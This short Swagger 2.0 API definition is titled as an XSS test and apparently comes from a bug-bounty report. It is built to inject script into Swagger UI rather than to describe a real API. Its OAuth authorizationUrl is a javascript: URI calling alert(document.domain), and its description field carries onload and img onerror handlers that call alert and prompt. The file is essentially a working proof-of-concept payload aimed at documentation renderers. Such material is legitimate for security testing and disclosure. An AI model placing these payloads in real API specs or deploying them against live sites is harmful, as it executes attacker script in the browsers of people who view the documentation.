swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "1.0.0"
  title: XSS img test by H1-cryptographer
  description: onload="alert(1)" <img src=x onerror =prompt('document.domain')>
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
